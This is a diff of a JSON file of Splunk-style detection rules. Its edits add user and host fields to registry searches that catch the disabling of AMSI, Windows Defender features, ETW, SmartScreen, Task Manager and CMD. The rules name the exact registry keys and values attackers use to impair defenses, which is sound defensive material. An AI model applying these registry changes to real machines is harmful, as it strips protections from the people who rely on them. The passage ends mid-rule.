| `disable_amsi_through_registry_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows Script\\\\Settings\\\\AmsiEnable\" Registry.registry_value_data = \"0x00000000\") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid Registry.dest Registry.user | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_amsi_through_registry_filter`", "tags": { "name": "Disable AMSI Through Registry", "analytic_story": [ @@ -235150,7 +237187,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "Disable AMSI Through Registry", + "message": "Disable AMSI Through Registry on $dest$", "mitre_attack_id": [ "T1562.001", "T1562" @@ -235214,7 +237251,7 @@ { "name": "Disable Defender AntiVirus Registry", "description": "This particular behavior is typically executed when an adversary or malware gains access to an endpoint and begins to perform execution and to evade detections. Usually, a batch (.bat) file will be executed and multiple registry and scheduled task modifications will occur. During triage, review parallel processes and identify any further file modifications. Endpoint should be isolated.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path = \"*\\\\Policies\\\\Microsoft\\\\Windows Defender*\" Registry.registry_value_name IN (\"DisableAntiSpyware\",\"DisableAntiVirus\") Registry.registry_value_data = 0x00000001) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_defender_antivirus_registry_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path = \"*\\\\Policies\\\\Microsoft\\\\Windows Defender*\" Registry.registry_value_name IN (\"DisableAntiSpyware\",\"DisableAntiVirus\") Registry.registry_value_data = 0x00000001) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid Registry.user Registry.dest | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_defender_antivirus_registry_filter`", "tags": { "name": "Disable Defender AntiVirus Registry", "analytic_story": [ @@ -235228,7 +237265,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "modified/added/deleted registry entry $registry_path$ in $dest$", + "message": "Modified/added/deleted registry entry $registry_path$ in $dest$", "mitre_attack_id": [ "T1562.001", "T1562" @@ -235299,7 +237336,7 @@ { "name": "Disable Defender BlockAtFirstSeen Feature", "description": "This analytic is intended to detect a suspicious modification of the Windows registry to disable a Windows Defender feature. This technique is intended to bypass or evade detection from Windows Defender AV, specifically the BlockAtFirstSeen feature where it blocks suspicious files the first time seen on the host.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path = \"*\\\\Microsoft\\\\Windows Defender\\\\SpyNet*\" Registry.registry_value_name = DisableBlockAtFirstSeen Registry.registry_value_data = 0x00000001) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_defender_blockatfirstseen_feature_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path = \"*\\\\Microsoft\\\\Windows Defender\\\\SpyNet*\" Registry.registry_value_name = DisableBlockAtFirstSeen Registry.registry_value_data = 0x00000001) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid Registry.user Registry.dest | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_defender_blockatfirstseen_feature_filter`", "tags": { "name": "Disable Defender BlockAtFirstSeen Feature", "analytic_story": [ @@ -235471,7 +237508,7 @@ { "name": "Disable Defender MpEngine Registry", "description": "This particular behavior is typically executed when an adversary or malware gains access to an endpoint and begins to perform execution and to evade detections. Usually, a batch (.bat) file will be executed and multiple registry and scheduled task modifications will occur. During triage, review parallel processes and identify any further file modifications. Endpoint should be isolated.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path = \"*\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\MpEngine*\" Registry.registry_value_name = MpEnablePus Registry.registry_value_data = 0x00000000) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_defender_mpengine_registry_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path = \"*\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\MpEngine*\" Registry.registry_value_name = MpEnablePus Registry.registry_value_data = 0x00000000) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid Registry.user Registry.dest | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_defender_mpengine_registry_filter`", "tags": { "name": "Disable Defender MpEngine Registry", "analytic_story": [ @@ -235485,7 +237522,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "modified/added/deleted registry entry $registry_path$ in $dest$", + "message": "Modified/added/deleted registry entry $registry_path$ in $dest$", "mitre_attack_id": [ "T1562.001", "T1562" @@ -235556,7 +237593,7 @@ { "name": "Disable Defender Spynet Reporting", "description": "This analytic is intended to detect a suspicious modification of registry to disable Windows Defender feature. This technique is intended to bypass or evade detection from Windows Defender AV product, specifically the spynet reporting for Defender telemetry.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path = \"*\\\\Microsoft\\\\Windows Defender\\\\SpyNet*\" Registry.registry_value_name = SpynetReporting Registry.registry_value_data = 0x00000000) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_defender_spynet_reporting_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path = \"*\\\\Microsoft\\\\Windows Defender\\\\SpyNet*\" Registry.registry_value_name = SpynetReporting Registry.registry_value_data = 0x00000000) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid Registry.user Registry.dest | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_defender_spynet_reporting_filter`", "tags": { "name": "Disable Defender Spynet Reporting", "analytic_story": [ @@ -235643,7 +237680,7 @@ { "name": "Disable Defender Submit Samples Consent Feature", "description": "This analytic is intended to detect a suspicious modification of the Windows registry to disable a Windows Defender feature. This technique is intended to bypass or evade detection from Windows Defender AV, specifically the feature that submits samples for further analysis.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path = \"*\\\\Microsoft\\\\Windows Defender\\\\SpyNet*\" Registry.registry_value_name = SubmitSamplesConsent Registry.registry_value_data = 0x00000000) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_defender_submit_samples_consent_feature_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path = \"*\\\\Microsoft\\\\Windows Defender\\\\SpyNet*\" Registry.registry_value_name = SubmitSamplesConsent Registry.registry_value_data = 0x00000000) BY _time span=1h Registry.user Registry.dest Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_defender_submit_samples_consent_feature_filter`", "tags": { "name": "Disable Defender Submit Samples Consent Feature", "analytic_story": [ @@ -235658,7 +237695,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "modified/added/deleted registry entry $Registry.registry_path$ in $dest$", + "message": "modified/added/deleted registry entry $registry_path$ in $dest$", "mitre_attack_id": [ "T1562.001", "T1562" @@ -235728,8 +237765,8 @@ }, { "name": "Disable ETW Through Registry", - "description": "this search is to identify modification in registry to disable ETW windows feature to evade detections. This technique was seen in several ransomware, RAT and even APT to impaire defenses of the compromise machine and to be able to execute payload with minimal alert as much as possible.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\ETWEnabled\" Registry.registry_value_data = \"0x00000000\") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_etw_through_registry_filter`", + "description": "This search is to identify modification in registry to disable ETW windows feature to evade detections. This technique was seen in several ransomware, RAT and even APT to impaire defenses of the compromise machine and to be able to execute payload with minimal alert as much as possible.", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\ETWEnabled\" Registry.registry_value_data = \"0x00000000\") BY _time span=1h Registry.dest Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_etw_through_registry_filter`", "tags": { "name": "Disable ETW Through Registry", "analytic_story": [ @@ -235743,7 +237780,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "Disable ETW Through Registry", + "message": "Disable ETW Through Registry on $dest$", "mitre_attack_id": [ "T1562.001", "T1562" @@ -235807,7 +237844,7 @@ { "name": "Disable Registry Tool", "description": "This search identifies modification of registry to disable the regedit or registry tools of the windows operating system. Since registry tool is a swiss knife in analyzing registry, malware such as RAT or trojan Spy disable this application to prevent the removal of their registry entry such as persistence, file less components and defense evasion.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableRegistryTools\" Registry.registry_value_data = \"0x00000001\") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`| where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_registry_tool_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableRegistryTools\" Registry.registry_value_data = \"0x00000001\") BY _time span=1h Registry.user Registry.dest Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`| where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_registry_tool_filter`", "tags": { "name": "Disable Registry Tool", "analytic_story": [ @@ -235993,7 +238030,7 @@ { "name": "Disable Show Hidden Files", "description": "The following analytic is to identify a modification in the Windows registry to prevent users from seeing all the files with hidden attributes. This event or techniques are known on some worm and trojan spy malware that will drop hidden files on the infected machine.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE ((Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\Hidden\" OR Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\HideFileExt\" Registry.registry_value_data = \"0x00000001\") OR (Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\ShowSuperHidden\" Registry.registry_value_data = \"0x00000000\")) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`| where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_show_hidden_files_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE ((Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\Hidden\" OR Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\HideFileExt\" Registry.registry_value_data = \"0x00000001\") OR (Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\ShowSuperHidden\" Registry.registry_value_data = \"0x00000000\")) BY _time span=1h Registry.user Registry.dest Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`| where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_show_hidden_files_filter`", "tags": { "name": "Disable Show Hidden Files", "analytic_story": [ @@ -236130,7 +238167,7 @@ { "name": "Disable Windows App Hotkeys", "description": "This analytic detects a suspicious registry modification to disable Windows hotkey (shortcut keys) for native Windows applications. This technique is commonly used to disable certain or several Windows applications like `taskmgr.exe` and `cmd.exe`. This technique is used to impair the analyst in analyzing and removing the attacker implant in compromised systems.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path=\"*\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\" AND Registry.registry_value_data= \"HotKey Disabled\" AND Registry.registry_value_name = \"Debugger\") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_windows_app_hotkeys_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path=\"*\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\" AND Registry.registry_value_data= \"HotKey Disabled\" AND Registry.registry_value_name = \"Debugger\") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_windows_app_hotkeys_filter`", "tags": { "name": "Disable Windows App Hotkeys", "analytic_story": [ @@ -236238,7 +238275,7 @@ { "name": "Disable Windows Behavior Monitoring", "description": "This search is to identifies a modification in registry to disable the windows denfender real time behavior monitoring. This event or technique is commonly seen in RAT, bot, or Trojan to disable AV to evade detections.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\\DisableBehaviorMonitoring\" OR Registry.registry_path= \"*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\\DisableOnAccessProtection\" OR Registry.registry_path= \"*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\\DisableScanOnRealtimeEnable\" OR Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\\DisableRealtimeMonitoring\" OR Registry.registry_path= \"*\\\\Real-Time Protection\\\\DisableIntrusionPreventionSystem\" OR Registry.registry_path= \"*\\\\Real-Time Protection\\\\DisableIOAVProtection\" OR Registry.registry_path= \"*\\\\Real-Time Protection\\\\DisableScriptScanning\" AND Registry.registry_value_data = \"0x00000001\") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_windows_behavior_monitoring_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\\DisableBehaviorMonitoring\" OR Registry.registry_path= \"*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\\DisableOnAccessProtection\" OR Registry.registry_path= \"*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\\DisableScanOnRealtimeEnable\" OR Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\\DisableRealtimeMonitoring\" OR Registry.registry_path= \"*\\\\Real-Time Protection\\\\DisableIntrusionPreventionSystem\" OR Registry.registry_path= \"*\\\\Real-Time Protection\\\\DisableIOAVProtection\" OR Registry.registry_path= \"*\\\\Real-Time Protection\\\\DisableScriptScanning\" AND Registry.registry_value_data = \"0x00000001\") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_windows_behavior_monitoring_filter`", "tags": { "name": "Disable Windows Behavior Monitoring", "analytic_story": [ @@ -236320,7 +238357,7 @@ { "name": "Disable Windows SmartScreen Protection", "description": "The following search identifies a modification of registry to disable the smartscreen protection of windows machine. This is windows feature provide an early warning system against website that might engage in phishing attack or malware distribution. This modification are seen in RAT malware to cover their tracks upon downloading other of its component or other payload.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\SmartScreenEnabled\" Registry.registry_value_data= \"Off\") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_windows_smartscreen_protection_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\SmartScreenEnabled\" Registry.registry_value_data= \"Off\") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_windows_smartscreen_protection_filter`", "tags": { "name": "Disable Windows SmartScreen Protection", "analytic_story": [ @@ -236404,8 +238441,8 @@ }, { "name": "Disabling CMD Application", - "description": "this search is to identify modification in registry to disable cmd prompt application. This technique is commonly seen in RAT, Trojan or WORM to prevent triaging or deleting there samples through cmd application which is one of the tool of analyst to traverse on directory and files.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\DisableCMD\" Registry.registry_value_data = \"0x00000001\") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disabling_cmd_application_filter`", + "description": "This search is to identify modification in registry to disable cmd prompt application. This technique is commonly seen in RAT, Trojan or WORM to prevent triaging or deleting there samples through cmd application which is one of the tool of analyst to traverse on directory and files.", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\DisableCMD\" Registry.registry_value_data = \"0x00000001\") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disabling_cmd_application_filter`", "tags": { "name": "Disabling CMD Application", "analytic_story": [ @@ -236520,7 +238557,7 @@ { "name": "Disabling ControlPanel", "description": "this search is to identify registry modification to disable control panel window. This technique is commonly seen in malware to prevent their artifacts , persistence removed on the infected machine.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoControlPanel\" Registry.registry_value_data = \"0x00000001\") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`| where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disabling_controlpanel_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoControlPanel\" Registry.registry_value_data = \"0x00000001\") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`| where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disabling_controlpanel_filter`", "tags": { "name": "Disabling ControlPanel", "analytic_story": [ @@ -236635,7 +238672,7 @@ { "name": "Disabling Defender Services", "description": "This particular behavior is typically executed when an adversaries or malware gains access to an endpoint and beings to perform execution and to evade detections. Usually, a batch (.bat) will be executed and multiple registry and scheduled task modifications will occur. During triage, review parallel processes and identify any further file modifications. Endpoint should be isolated.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path = \"*\\\\System\\\\CurrentControlSet\\\\Services\\\\*\" AND (Registry.registry_path IN(\"*WdBoot*\", \"*WdFilter*\", \"*WdNisDrv*\", \"*WdNisSvc*\",\"*WinDefend*\", \"*SecurityHealthService*\")) AND Registry.registry_value_name = Start Registry.registry_value_data = 0x00000004) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`| where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disabling_defender_services_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path = \"*\\\\System\\\\CurrentControlSet\\\\Services\\\\*\" AND (Registry.registry_path IN(\"*WdBoot*\", \"*WdFilter*\", \"*WdNisDrv*\", \"*WdNisSvc*\",\"*WinDefend*\", \"*SecurityHealthService*\")) AND Registry.registry_value_name = Start Registry.registry_value_data = 0x00000004) BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`| where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disabling_defender_services_filter`", "tags": { "name": "Disabling Defender Services", "analytic_story": [ @@ -236806,7 +238843,7 @@ { "name": "Disabling FolderOptions Windows Feature", "description": "This search is to identify registry modification to disable folder options feature of windows to show hidden files, file extension and etc. This technique used by malware in combination if disabling show hidden files feature to hide their files and also to hide the file extension to lure the user base on file icons or fake file extensions.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoFolderOptions\" Registry.registry_value_data = \"0x00000001\") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`| where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disabling_folderoptions_windows_feature_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoFolderOptions\" Registry.registry_value_data = \"0x00000001\") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`| where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disabling_folderoptions_windows_feature_filter`", "tags": { "name": "Disabling FolderOptions Windows Feature", "analytic_story": [ @@ -236891,7 +238928,7 @@ { "name": "Disabling NoRun Windows App", "description": "This search is to identify modification of registry to disable run application in window start menu. this application is known to be a helpful shortcut to windows OS user to run known application and also to execute some reg or batch script. This technique is used malware to make cleaning of its infection more harder by preventing known application run easily through run shortcut.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoRun\" Registry.registry_value_data = \"0x00000001\") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`| where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disabling_norun_windows_app_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoRun\" Registry.registry_value_data = \"0x00000001\") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`| where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disabling_norun_windows_app_filter`", "tags": { "name": "Disabling NoRun Windows App", "analytic_story": [ @@ -237006,7 +239043,7 @@ { "name": "Disabling Task Manager", "description": "This search is to identifies modification of registry to disable the task manager of windows operating system. this event or technique are commonly seen in malware such as RAT, Trojan, TrojanSpy or worm to prevent the user to terminate their process.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableTaskMgr\" Registry.registry_value_data = \"0x00000001\") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disabling_task_manager_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableTaskMgr\" Registry.registry_value_data = \"0x00000001\") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disabling_task_manager_filter`", "tags": { "name": "Disabling Task Manager", "analytic_story": [ @@ -237091,7 +239128,7 @@ { "name": "ETW Registry Disabled", "description": "This analytic is to detect a registry modification to disable ETW feature of windows. This technique is to evade EDR appliance to evade detections and hide its execution from audit logs.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path=\"*\\\\SOFTWARE\\\\Microsoft\\\\.NETFramework*\" Registry.registry_value_name = ETWEnabled Registry.registry_value_data=0x00000000) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `etw_registry_disabled_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path=\"*\\\\SOFTWARE\\\\Microsoft\\\\.NETFramework*\" Registry.registry_value_name = ETWEnabled Registry.registry_value_data=0x00000000) BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name 